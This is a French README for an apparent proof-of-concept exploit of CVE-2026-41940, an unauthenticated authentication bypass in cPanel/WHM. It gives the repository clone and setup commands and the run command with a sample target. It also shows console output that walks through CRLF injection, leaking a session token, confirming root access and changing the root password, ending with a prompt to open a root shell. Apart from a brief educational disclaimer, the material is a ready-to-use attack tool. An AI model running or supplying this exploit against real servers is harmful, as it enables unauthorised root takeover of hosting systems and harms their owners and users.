
Preuve de concept d'exploitation pour CVE-2026-41940, un contournement d'authentification non authentifié dans cPanel/WHM utilisant une injection CRLF pour divulguer les jetons de sécurité et réinitialiser le mot de passe root.
CVE-2026-41940 est un exploit de preuve de concept (PoC) ciblant cPanel/WHM.
Cet exploit démontre un contournement d'authentification non authentifié utilisant une injection CRLF pour fuiter des jetons de sécurité et obtenir un accès de niveau root à l'interface WHM, permettant des actions telles que la modification du mot de passe root.
Avertissement : Ce PoC est à des fins éducatives uniquement. Ne pas l'utiliser sur des systèmes sans autorisation.
cp_security_token.requests.git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
pip install requests
Prérequis :
requests,urllib3
python3 CVE_2026_41940.py --target <URL_CIBLE> --password <NOUVEAU_MOT_DE_PASSE>
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
La console affiche :
[0-4][+][!][*]Exemple :
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
| Flag | Description | Requis | Défaut |
|---|
--target | URL cible WHM (ex. : https://host:2087) | Oui | - |
--password | Nouveau mot de passe pour l'utilisateur root | Oui | - |
--hostname | Remplacer l'en-tête Host: | Non | Auto |